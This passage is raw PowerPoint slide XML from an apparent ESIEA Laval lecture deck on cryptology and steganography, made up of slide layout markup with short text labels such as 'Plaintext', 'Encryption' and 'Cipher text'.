                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-347" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="4594851"/>
            <a:ext cx="8418352" cy="1457168"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4248150" h="735330">
                <a:moveTo>
                  <a:pt x="0" y="734931"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="734931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="734931"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="5301674"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="5717885"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="4594851"/>
            <a:ext cx="8418352" cy="1267389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Nowadays	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762578" marR="1595625">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="436"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>massive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cryptology </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>mails, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>payment, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bank </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. . .  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>steganography unknown </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(terrorists</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?)</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="-129" dirty="0"/>
              <a:pPr marL="50335">
                <a:lnSpc>
                  <a:spcPts val="1367"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4232349407"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618110" y="102655"/>
            <a:ext cx="967670" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>A.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Definitions</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549737" y="682125"/>
            <a:ext cx="1620753" cy="426912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Definitions</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205264" y="1822415"/>
            <a:ext cx="886630" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7822333" y="2265730"/>
            <a:ext cx="591434" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4274764" y="1822415"/>
            <a:ext cx="886630" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6344266" y="1529304"/>
            <a:ext cx="886630" cy="588305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5752831" y="3595678"/>
            <a:ext cx="1182870" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199004" y="5074786"/>
            <a:ext cx="892889" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049070" y="5074786"/>
            <a:ext cx="591434" cy="591434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707245" y="2446500"/>
            <a:ext cx="629174" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="10" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>ext</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2200958" y="2446500"/>
            <a:ext cx="893428" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" b="1" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" b="1" spc="50" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" b="1" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" b="1" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>rypt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" b="1" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>ion</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275019" y="4072685"/>
            <a:ext cx="746201" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Crytpo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="-159" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4334089" y="2481964"/>
            <a:ext cx="767593" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>Cipher</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="10" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="30" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
